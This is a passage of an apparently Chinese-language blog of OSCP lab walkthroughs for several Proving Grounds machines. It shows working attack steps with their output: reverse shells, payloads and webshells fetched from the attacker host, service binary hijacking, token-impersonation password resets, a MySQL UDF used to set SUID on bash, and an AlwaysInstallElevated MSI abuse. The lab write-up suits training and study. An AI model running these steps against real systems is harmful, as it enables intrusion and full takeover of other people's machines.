c3R5bGVzLnhtbFBLAQIUAxQAAAAIAGUpzFq0oNiO2AYAAFs\/AAAMAAAAAAAAAAAAAAC0gQUIAABz\n -> ZXR0aW5ncy54bWxQSwECFAMUAAAACABlKcxaH5hVdl4EAABoDwAACwAAAAAAAAAAAAAAtIEHDwAA\n -> Y29udGVudC54bWxQSwECFAMUAAAACABlKcxa1fiycQYBAACTAwAADAAAAAAAAAAAAAAAtIGOEwAA\n -> bWFuaWZlc3QucmRmUEsBAhQDFAAAAAgAZSnMWoVsOYosAAAALgAAAAgAAAAAAAAAAAAAALSBvhQA\n -> AG1pbWV0eXBlUEsBAhQDFAAAAAgAZSnMWsQp0KCnAQAAaAMAAAgAAAAAAAAAAAAAALSBEBUAAG1l\n -> dGEueG1sUEsBAhQDFAAAAAgAZSnMWr3ammxVAQAAaQUAABUAAAAAAAAAAAAAALSB3RYAAE1FVEEt\n -> SU5GL21hbmlmZXN0LnhtbFBLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAPAAAAAAAAAAAAEAD9\n -> QWUYAABCYXNpYy9TdGFuZGFyZC9QSwECFAMUAAAACABlKcxaTmWDcdQAAABWAQAAEwAAAAAAAAAA\n -> AAAAtIGSGAAAQmFzaWMvc2NyaXB0LWxjLnhtbFBLAQIUAxQAAAAIAGUpzFq6Tp8w2QAAAGABAAAc\n -> AAAAAAAAAAAAAAC0gZcZAABCYXNpYy9TdGFuZGFyZC9zY3JpcHQtbGIueG1sUEsBAhQDFAAAAAgA\n -> ZSnMWsu5SyCSAwAAHgcAABoAAAAAAAAAAAAAALSBqhoAAEJhc2ljL1N0YW5kYXJkL01vZHVsZTEu\n -> eG1sUEsBAhQDFAAAAAAAZSnMWgAAAAAAAAAAAAAAABwAAAAAAAAAAAAQAP1BdB4AAENvbmZpZ3Vy\n -> YXRpb25zMi9hY2NlbGVyYXRvci9QSwECFAMUAAAAAABlKcxaAAAAAAAAAAAAAAAAGAAAAAAAAAAA\n -> ABAA\/UGuHgAAQ29uZmlndXJhdGlvbnMyL2Zsb2F0ZXIvUEsBAhQDFAAAAAAAZSnMWgAAAAAAAAAA\n -> AAAAABcAAAAAAAAAAAAQAP1B5B4AAENvbmZpZ3VyYXRpb25zMi9pbWFnZXMvUEsBAhQDFAAAAAAA\n -> ZSnMWgAAAAAAAAAAAAAAABgAAAAAAAAAAAAQAP1BGR8AAENvbmZpZ3VyYXRpb25zMi9tZW51YmFy\n -> L1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAaAAAAAAAAAAAAEAD9QU8fAABDb25maWd1cmF0\n -> aW9uczIvcG9wdXBtZW51L1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAcAAAAAAAAAAAAEAD9\n -> QYcfAABDb25maWd1cmF0aW9uczIvcHJvZ3Jlc3NiYXIvUEsBAhQDFAAAAAAAZSnMWgAAAAAAAAAA\n -> AAAAABoAAAAAAAAAAAAQAP1BwR8AAENvbmZpZ3VyYXRpb25zMi9zdGF0dXNiYXIvUEsBAhQDFAAA\n -> AAAAZSnMWgAAAAAAAAAAAAAAABgAAAAAAAAAAAAQAP1B+R8AAENvbmZpZ3VyYXRpb25zMi90b29s\n -> YmFyL1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAaAAAAAAAAAAAAEAD9QS8gAABDb25maWd1\n -> cmF0aW9uczIvdG9vbHBhbmVsL1BLAQIUAxQAAAAAAGUpzFoAAAAAAAAAAAAAAAAfAAAAAAAAAAAA\n -> EAD9QWcgAABDb25maWd1cmF0aW9uczIvaW1hZ2VzL0JpdG1hcHMvUEsBAhQDFAAAAAgAZSnMWqaE\n -> MFVgAAAAkwAAABgAAAAAAAAAAAAAALSBpCAAAFRodW1ibmFpbHMvdGh1bWJuYWlsLnBuZ1BLBQYA\n -> AAAAGgAaAJwGAAA6IQAAAAA=\n -> \n -> ------=_MIME_BOUNDARY_000_910526--\n -> \n -> \n -> .\n<-  250 Data received OK.\n -> QUIT\n<-  221 localhost Service closing channel.\n=== Connection closed with remote host.<\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ rlwrap nc -lvnp 4444 \nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.140] 50825\nwhoami\nhepet\\ela arwel\nPS C:\\Program Files\\LibreOffice\\program> cd ~\nPS C:\\Users\\Ela Arwel> type desktop\\local.txt\ne8c6f0142988b765cb26eec62b29b742\nPS C:\\Users\\Ela Arwel> <\/code><\/pre>\n\n\n\n
Privilege Escalation – service binary hijack<\/h3>\n\n\n\n
\u7528 powerup \u67e5\u770b\uff0c\u5728\u64c1\u6709\u6b0a\u9650\u7684\u8cc7\u6599\u593e\u4e0b\u6709\u500b\u662f\u7528 system \u5728\u8dd1\u7684 service <\/p>\n\n\n\n
PS C:\\Users\\Ela Arwel> . .\\PowerUp.ps1\nPS C:\\Users\\Ela Arwel> Invoke-AllChecks\n\n\n\nServiceName    : VeyonService\nPath           : C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe\nModifiablePath : @{ModifiablePath=C:\\Users\\Ela Arwel\\Veyon\\veyon-service.exe; IdentityReference=HEPET\\Ela Arwel; \n                 Permissions=System.Object[]}\nStartName      : LocalSystem\nAbuseFunction  : Write-ServiceBinary -Name 'VeyonService' -Path <HijackPath>\nCanRestart     : False\nName           : VeyonService\nCheck          : Unquoted Service Paths<\/code><\/pre>\n\n\n\n
PS C:\\Users\\Ela Arwel\\Veyon> mv veyon-service.exe veyon-service.exe.bak\nPS C:\\Users\\Ela Arwel\\Veyon> cp \/\/192.168.45.228\/share\/exp.exe .\nPS C:\\Users\\Ela Arwel\\Veyon> mv exp.exe veyon-service.exe\nPS C:\\Users\\Ela Arwel\\Veyon> shutdown -r -t 0<\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Hepet]\n\u2514\u2500$ rlwrap nc -lvnp 6969\nlistening on [any] 6969 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.140] 49668\nMicrosoft Windows [Version 10.0.19042.1348]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32>whoami\nwhoami\nnt authority\\system\n\nC:\\WINDOWS\\system32><\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Billyboss<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.61<\/td>TCP:21,80,135,139,445,5040,8081<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u5728 8081 port \u8dd1\u8457 Sonatype Nexus Repository Manager\uff0c\u6709 auth RCE <\/p>\n\n\n\n
Initial Access<\/h3>\n\n\n\n
\u4f7f\u7528 exploit<\/a> \u4fee\u6539 URL,CMD,USERNAME,PASSWORD \u3002\u9019\u88e1\u5e33\u5bc6\u4f7f\u7528 nexus\/nexus <\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Billyboss]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.61] 49853\nwhoami\nbillyboss\\nathan\nPS C:\\Users\\nathan\\Nexus\\nexus-3.21.0-05> cd ~\nPS C:\\Users\\nathan> type desktop\\local.txt\n10b6ad854ab7587cdc005dd7f0eacd53\nPS C:\\Users\\nathan> <\/code><\/pre>\n\n\n\n
Privilege Escalation – SeImpersonatePrivilege<\/h3>\n\n\n\n
\u4f7f\u7528 SigmaPotato.exe \u66f4\u6539 administrator \u7684\u5bc6\u78bc\uff0c\u4e4b\u5f8c\u518d\u7528 psexec \u767b\u5165<\/p>\n\n\n\n
PS C:\\Users\\nathan> .\\SigmaPotato.exe \"net user administrator pwn\"\n[+] Starting Pipe Server...\n[+] Created Pipe Name: \\\\.\\pipe\\SigmaPotato\\pipe\\epmapper\n[+] Pipe Connected!\n[+] Impersonated Client: NT AUTHORITY\\NETWORK SERVICE\n[+] Searching for System Token...\n[+] PID: 832 | Token: 0x768 | User: NT AUTHORITY\\SYSTEM\n[+] Found System Token: True\n[+] Duplicating Token...\n[+] New Token Handle: 952\n[+] Current Command Length: 26 characters\n[+] Creating Process via 'CreateProcessWithTokenW'\n[+] Process Started with PID: 4884\n\n[+] Process Output:\nThe command completed successfully.\n\n\nPS C:\\Users\\nathan> <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Billyboss]\n\u2514\u2500$ impacket-psexec 'Administrator':'pwn'@'192.168.162.61'               \nImpacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies \n\n[*] Requesting shares on 192.168.162.61.....\n[*] Found writable share ADMIN$\n[*] Uploading file KobNoVMV.exe\n[*] Opening SVCManager on 192.168.162.61.....\n[*] Creating service mzDR on 192.168.162.61.....\n[*] Starting service mzDR.....\n[!] Press help for extra shell commands\nMicrosoft Windows [Version 10.0.18362.719]\n(c) 2019 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32> type c:\\users\\administrator\\desktop\\proof.txt\n473ba6697c2261e11c5ab2359726456b\n\nC:\\Windows\\system32> <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Craft<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.228.169<\/td>TCP:80<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web Enumeration <\/strong><\/p>\n\n\n\n
\u7db2\u7ad9\u529f\u80fd\u662f\u8981 user \u4e0a\u50b3\u81ea\u5df1\u7684 resume \uff0c\u4e26\u4e14\u53ea\u63a5\u53d7 odt file<\/p>\n\n\n\n
Initial Access – ODT macro with revshell <\/h3>\n\n\n\n
\u4f7f\u7528 Macro Generator<\/a> \u7522\u751f\u4e00\u500b odf file \u4e26\u4e0a\u50b3<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Craft]\n\u2514\u2500$ rlwrap nc -lvnp 4444\nlistening on [any] 4444 ...\nconnect to [192.168.45.233] from (UNKNOWN) [192.168.228.169] 49828\nwhoami\ncraft\\thecybergeek\nPS C:\\Program Files\\LibreOffice\\program> cd ~\nPS C:\\Users\\thecybergeek> type desktop\\local.txt\nf445b235557331d186400f6ff386d15f\nPS C:\\Users\\thecybergeek> <\/code><\/pre>\n\n\n\n
Privilege Escalation  – SeImpersonatePrivilege<\/h3>\n\n\n\n
\u53ef\u4ee5\u5beb\u5165 C:\\xampp\\htdocs \uff0c\u5229\u7528 service account \u6709 SeImpersonatePrivilege \uff0c\u5beb\u5165\u4e00\u500b webshell \u4e4b\u5f8c\u62ff\u5230 service account \u7684 revshell <\/p>\n\n\n\n
PS C:\\xampp\\htdocs> icacls C:\\xampp\\htdocs\nC:\\xampp\\htdocs CRAFT\\apache:(OI)(CI)(F)\n                CRAFT\\apache:(I)(OI)(CI)(F)\n                NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)\n                BUILTIN\\Administrators:(I)(OI)(CI)(F)\n                BUILTIN\\Users:(I)(OI)(CI)(RX)\n                BUILTIN\\Users:(I)(CI)(AD)\n                BUILTIN\\Users:(I)(CI)(WD)\n                CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n\nSuccessfully processed 1 files; Failed processing 0 files\nPS C:\\xampp\\htdocs> whoami\ncraft\\thecybergeek\nPS C:\\xampp\\htdocs> curl.exe 192.168.45.233:8000\/shell.php -o shell.php\nPS C:\\xampp\\htdocs> <\/code><\/pre>\n\n\n\n
\u4f7f\u7528 SigmaPotato.exe <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Craft]\n\u2514\u2500$ rlwrap nc -lvnp 8787\nlistening on [any] 8787 ...\nconnect to [192.168.45.233] from (UNKNOWN) [192.168.228.169] 49929\nwhoami \/priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name                Description                               State   \n============================= ========================================= ========\nSeTcbPrivilege                Act as part of the operating system       Disabled\nSeChangeNotifyPrivilege       Bypass traverse checking                  Enabled \nSeImpersonatePrivilege        Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege       Create global objects                     Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set            Disabled\nPS C:\\xampp\\htdocs> curl.exe 192.168.45.233:8000\/SigmaPotato.exe -o SigmaPotato.exe<\/code><\/pre>\n\n\n\n
\u5148\u628a Administrator \u7684\u5bc6\u78bc\u6539\u70ba pwn<\/p>\n\n\n\n
PS C:\\xampp\\htdocs> .\\SigmaPotato.exe \"net user Administrator pwn\"\n[+] Starting Pipe Server...\n[+] Created Pipe Name: \\\\.\\pipe\\SigmaPotato\\pipe\\epmapper\n[+] Pipe Connected!\n[+] Impersonated Client: NT AUTHORITY\\NETWORK SERVICE\n[+] Searching for System Token...\n[+] PID: 880 | Token: 0x804 | User: NT AUTHORITY\\SYSTEM\n[+] Found System Token: True\n[+] Duplicating Token...\n[+] New Token Handle: 992\n[+] Current Command Length: 26 characters\n[+] Creating Process via 'CreateProcessWithTokenW'\n[+] Process Started with PID: 4708\n\n[+] Process Output:\nThe command completed successfully.<\/code><\/pre>\n\n\n\n
\u5f9e\u653b\u64ca\u6a5f\u4e0b\u8f09 enable RDP script \u518d\u53bb\u57f7\u884c<\/p>\n\n\n\n
PS C:\\xampp\\htdocs> type enablerdp.cmd\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f\nnetsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes\nPS C:\\xampp\\htdocs> .\\SigmaPotato.exe \"cmd.exe \/c C:\\xampp\\htdocs\\enablerdp.cmd\"\n[+] Starting Pipe Server...\n[+] Created Pipe Name: \\\\.\\pipe\\SigmaPotato\\pipe\\epmapper\n[+] Pipe Connected!\n[+] Impersonated Client: NT AUTHORITY\\NETWORK SERVICE\n[+] Searching for System Token...\n[+] PID: 880 | Token: 0x804 | User: NT AUTHORITY\\SYSTEM\n[+] Found System Token: True\n[+] Duplicating Token...\n[+] New Token Handle: 948\n[+] Current Command Length: 40 characters\n[+] Creating Process via 'CreateProcessWithTokenW'\n[+] Process Started with PID: 4288\n\n[+] Process Output:\n\nC:\\Windows\\system32>reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f \nThe operation completed successfully.\n\n\nC:\\Windows\\system32>netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes \nThe following helper DLL cannot be loaded: RASMONTR.DLL.\nThe following helper DLL cannot be loaded: DOT3CFG.DLL.\nThe following helper DLL cannot be loaded: HNETMON.DLL.\nThe following helper DLL cannot be loaded: NETTRACE.DLL.\nThe following helper DLL cannot be loaded: NSHIPSEC.DLL.\nThe following helper DLL cannot be loaded: PEERDISTSH.DLL.\n\nUpdated 3 rule(s).\nOk.\n\n\nPS C:\\xampp\\htdocs><\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
Pebbles (without sqlmap<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.52<\/td>TCP:21,22,80,3305,8080<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web Enumeration <\/strong><\/p>\n\n\n\n
\u7db2\u7ad9\u5728 8080 port \uff0c\u5176\u4e2d \/zm \u53ef\u4ee5\u770b\u5230\u7db2\u7ad9\u904b\u884c ZoneMinder Console v1.29\uff0c\u5177\u6709 SQLI<\/a><\/p>\n\n\n\n
Initial Access – SQLI to RCE<\/h3>\n\n\n\n
\u6839\u64da exploit \u7684 sql injection parameter\uff0c\u6ce8\u5165 webshell <\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u8a2a\u554f 3305 port \u7684\u7db2\u7ad9 \/shell.php \u4f86\u57f7\u884c webshell \u53bb\u57f7\u884c revshell\u3002<\/p>\n\n\n\n
\u62ff\u5230\u7684\u8eab\u5206\u662f www-data \u9084\u62ff\u4e0d\u5230 local.txt \uff0c\u89c0\u5bdf\u904b\u884c\u7684\u670d\u52d9\u767c\u73fe mysql \u662f\u7528 root \u6b0a\u9650\u5728\u8dd1<\/p>\n\n\n\n
www-data@pebbles:\/tmp$ ss -tuln\nss -tuln\nNetid  State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              \ntcp    LISTEN     0      128       *:22                    *:*                  \ntcp    LISTEN     0      80     127.0.0.1:3306                  *:*                  \ntcp    LISTEN     0      128      :::8080                 :::*                  \ntcp    LISTEN     0      128      :::80                   :::*                  \ntcp    LISTEN     0      32       :::21                   :::*                  \ntcp    LISTEN     0      128      :::22                   :::*                  \ntcp    LISTEN     0      128      :::3305                 :::*                  \nwww-data@pebbles:\/tmp$ ps aux | grep mysql\nps aux | grep mysql\nroot      1152  0.0 20.8 1153680 211832 ?      Ssl  22:02   0:00 \/usr\/sbin\/mysqld\nwww-data 24104  0.0  0.0  11284   944 pts\/0    S+   22:23   0:00 grep mysql\nwww-data@pebbles:\/tmp$ <\/code><\/pre>\n\n\n\n
\u5229\u7528sqli \u66f4\u6539 mysql root \u7684\u5bc6\u78bc\u53c3\u8003 hacktricks<\/a> 
<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u9019\u6a23\u5c31\u53ef\u4ee5\u4f7f\u7528 mysql \u4e86<\/p>\n\n\n\n
www-data@pebbles:\/tmp$ mysql -uroot -h localhost -pMyNewPass\nmysql -uroot -h localhost -pMyNewPass\nmysql: [Warning] Using a password on the command line interface can be insecure.\nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 32\nServer version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)\n\nCopyright (c) 2000, 2020, Oracle and\/or its affiliates. All rights reserved.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nmysql> <\/code><\/pre>\n\n\n\n
\u56e0\u70ba\u77e5\u9053 mysql \u662f\u7528 root \u6b0a\u9650\u5728\u57f7\u884c\uff0c\u4f5c\u6cd5\u53c3\u8003 hacktricks<\/a> \uff0c\u642d\u914d\u9019\u500b UDF exploit<\/a> \u4f86\u63d0\u6b0a<\/p>\n\n\n\n
mysql> use mysql;\nuse mysql;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> create table foo(line blob);\ncreate table foo(line blob);\nQuery OK, 0 rows affected (0.01 sec)\n\nmysql> insert into foo values(load_file('\/tmp\/lib_mysqludf_sys_64.so'));\ninsert into foo values(load_file('\/tmp\/lib_mysqludf_sys_64.so'));\nQuery OK, 1 row affected (0.00 sec)\n\nmysql> select * from foo into dumpfile '\/usr\/lib\/mysql\/plugin\/lib_mysqludf_sys_64.so';\nselect * from foo into dumpfile '\/usr\/lib\/mysql\/plugin\/lib_mysqludf_sys_64.so';\nQuery OK, 1 row affected (0.00 sec)\n\nmysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';\ncreate function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> <\/code><\/pre>\n\n\n\n
\u5df2\u7d93\u6709\u53ef\u4ee5\u57f7\u884c root \u6b0a\u9650\u7684\u74b0\u5883\u4e86\uff0c\u76f4\u63a5\u628a \/bin\/bash \u8a2d\u5b9a SUID <\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
mysql> select sys_exec('chmod +s \/bin\/bash');\nselect sys_exec('chmod +s \/bin\/bash');\n+--------------------------------+\n| sys_exec('chmod +s \/bin\/bash') |\n+--------------------------------+\n|                              0 |\n+--------------------------------+\n1 row in set (0.00 sec)\n\nmysql> exit\nexit\nBye\nwww-data@pebbles:\/tmp$ ls -lh \/bin\/bash\nls -lh \/bin\/bash\n-rwsr-sr-x 1 root root 1014K Jul 12  2019 \/bin\/bash\nwww-data@pebbles:\/tmp$ \/bin\/bash -p\n\/bin\/bash -p\nbash-4.3# cat \/root\/proof.txt\ncat \/root\/proof.txt\n2e5766ea30d43cb95ed66ea95459b517\nbash-4.3# <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Clue<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.240<\/td>TCP:22,80,139,445,3000,8021<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
FTP enumeration<\/strong><\/p>\n\n\n\n
\u5728 8021 \u8dd1 FreeSWITCH \uff0c\u9019\u6771\u897f\u6709 RCE \u6f0f\u6d1e\u4f46\u662f\u9700\u8981\u5bc6\u78bc<\/p>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u904b\u884c cassandra web \uff0c\u6709 Remote File Read<\/p>\n\n\n\n
Initial Access <\/h3>\n\n\n\n
\u627e\u5230 FreeSWITCH \u5b58\u653e\u5bc6\u78bc\u7684\u6a94\u6848 \/etc\/freeswitch\/autoload_configs\/event_socket.conf.xml\uff0c\u4e26\u8b80\u53d6\u5bc6\u78bc<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Clue]\n\u2514\u2500$ python3 49362 192.168.162.240 -p 3000 \/etc\/freeswitch\/autoload_configs\/event_socket.conf.xml           \n\n<configuration name=\"event_socket.conf\" description=\"Socket Client\">\n  <settings>\n    <param name=\"nat-map\" value=\"false\"\/>\n    <param name=\"listen-ip\" value=\"0.0.0.0\"\/>\n    <param name=\"listen-port\" value=\"8021\"\/>\n    <param name=\"password\" value=\"StrongClueConEight021\"\/>\n  <\/settings>\n<\/configuration><\/code><\/pre>\n\n\n\n
\u4f7f\u7528 exploit<\/a> \uff0c\u4fee\u6539\u70ba self.PASSWORD = ‘StrongClueConEight021’<\/p>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Clue]\n\u2514\u2500$ rlwrap nc -lvnp 3000\nlistening on [any] 3000 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.240] 45240\nwhoami\nfreeswitch\npython3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'\nfreeswitch@clue:\/$ cd ~\ncd ~\nfreeswitch@clue:\/var\/lib\/freeswitch$ ls\nls\ndb  images  local.txt  recordings  storage\nfreeswitch@clue:\/var\/lib\/freeswitch$ cat local.txt\ncat local.txt\ncd87c4223a295c13753bc33528d6594e\nfreeswitch@clue:\/var\/lib\/freeswitch$ <\/code><\/pre>\n\n\n\n
privilege escalation<\/h3>\n\n\n\n
\u7528 lineas \u770b\u5230 cassie \u7684\u5bc6\u78bc SecondBiteTheApple330<\/p>\n\n\n\n
cassie     930  0.0  1.6 623244 34460 ?        Ssl  01:44   0:00 \/usr\/bin\/ruby2.5 \/usr\/local\/bin\/cassandra-web -u cassie -p SecondBiteTheApple330<\/code><\/pre>\n\n\n\n
\u5207\u63db\u5230 cassie \u5f8c\u767c\u73fe\u5bb6\u76ee\u9304\u6709\u4e00\u500b id_rsa \uff0c\u5617\u8a66\u5f8c\u767c\u73fe\u662f root \u7684 id_rsa<\/p>\n\n\n\n
cassie@clue:~$ ssh root@localhost -i id_rsa\nssh root@localhost -i id_rsa\nLinux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Mon Apr 29 17:57:54 2024\nroot@clue:~# cat \/root\/proof.txt\ncat \/root\/proof.txt\nThe proof is in another file\nroot@clue:~# ls \/root\nls \/root\nproof.txt  proof_youtriedharder.txt  smbd.sh\nroot@clue:~# cat \/root\/proof_youtriedharder.txt\ncat \/root\/proof_youtriedharder.txt\nf62d718fb1d06a5a658a09eb5af12404\nroot@clue:~# <\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
Shenzi<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.55<\/td>TCP:21,80,135,139,443,445,3306,7680<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
SMB enumeration<\/strong><\/p>\n\n\n\n
SMB \u533f\u540d\u767b\u5165\uff0c\u767c\u73fe\u542b\u6709 wordpress \u5e33\u5bc6\u7684\u6587\u4ef6\uff0c\u548c\u6700\u91cd\u8981\u7684\u8def\u5f91\u540d\u7a31 \/shenzi<\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Shenzi]\n\u2514\u2500$ smbclient  \/\/192.168.162.55\/Shenzi -N\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Thu May 28 11:45:09 2020\n  ..                                  D        0  Thu May 28 11:45:09 2020\n  passwords.txt                       A      894  Thu May 28 11:45:09 2020\n  readme_en.txt                       A     7367  Thu May 28 11:45:09 2020\n  sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 11:45:09 2020\n  why.tmp                             A      213  Thu May 28 11:45:09 2020\n  xampp-control.ini                   A      178  Thu May 28 11:45:09 2020\n\n                12941823 blocks of size 4096. 6495214 blocks available\nsmb: \\> <\/code><\/pre>\n\n\n\n
Initial Access <\/h3>\n\n\n\n
\u5728\u7db2\u7ad9 \/shenzi\/wp-login.php \u4f7f\u7528\u5f97\u5230\u7684\u5e33\u5bc6 admin\/FeltHeadwallWight357 \u767b\u5165\uff0c\u4e0a\u50b3\u4e26\u5b89\u88dd\u4e00\u500b wordpress-webshell-plugin<\/a> <\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Shenzi]\n\u2514\u2500$ curl -X POST 'http:\/\/192.168.162.55\/shenzi\/wp-content\/plugins\/wp_webshell\/wp_webshell.php' --data \"action=exec&cmd=whoami\"\n{\"stdout\":\"shenzi\\\\shenzi\\r\\n\",\"stderr\":\"\",\"exec\":\"whoami\"}   <\/code><\/pre>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Shenzi]\n\u2514\u2500$ rlwrap nc -lvnp 4444                 \nlistening on [any] 4444 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.55] 50413\nwhoami\nshenzi\\shenzi\nPS C:\\> cd ~\nPS C:\\Users\\shenzi> type desktop\\local.txt\nf02c9a772e5593da5d8ef7a458b96f96\nPS C:\\Users\\shenzi> <\/code><\/pre>\n\n\n\n
privilege escalation – abuse Write-UserAddMSI<\/h3>\n\n\n\n
\u7528 powerup \u67e5\u770b\uff0c\u6709 Write-UserAddMSI \u53ef\u4ee5\u5229\u7528<\/p>\n\n\n\n
Check         : AlwaysInstallElevated Registry Key\nAbuseFunction : Write-UserAddMSI\n\nDefaultDomainName    : SHENZI\nDefaultUserName      : shenzi\nDefaultPassword      : \nAltDefaultDomainName : \nAltDefaultUserName   : \nAltDefaultPassword   : \nCheck                : Registry Autologons<\/code><\/pre>\n\n\n\n
\u4f5c\u6cd5\u53c3\u8003 \u9019\u7bc7<\/a> <\/p>\n\n\n\n
PS C:\\Users\\shenzi> cp \/\/192.168.45.228\/share\/evil.msi .\nPS C:\\Users\\shenzi> msiexec \/q \/i  evil.msi\nPS C:\\Users\\shenzi> <\/code><\/pre>\n\n\n\n
Proof<\/strong><\/p>\n\n\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/oscp\/pg\/Shenzi]\n\u2514\u2500$ rlwrap nc -lvnp 443 \nlistening on [any] 443 ...\nconnect to [192.168.45.228] from (UNKNOWN) [192.168.162.55] 49971\nMicrosoft Windows [Version 10.0.19042.1526]\n(c) Microsoft Corporation. All rights reserved.\n\nC:\\WINDOWS\\system32>whoami\nwhoami\nnt authority\\system\n\nC:\\WINDOWS\\system32><\/code><\/pre>\n\n\n\n
Nukem<\/h2>\n\n\n\n
Service Enumeration<\/h3>\n\n\n\n
Port Scan Results<\/strong><\/p>\n\n\n\n
Server IP Address<\/td>Ports Open<\/td><\/tr>
192.168.162.105<\/strong><\/strong><\/td>TCP:22,80,3306,5000,13000,36445<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
Web enumeration<\/strong><\/p>\n\n\n\n
\u5728 80 port \u7684\u7db2\u7ad9\u4f7f\u7528 wordpress \uff0c\u7528 wpscan \u627e\u5230\u6709 RCE plugin <\/p>\n\n\n\n
Initial Access <\/h3>\n\n\n\n
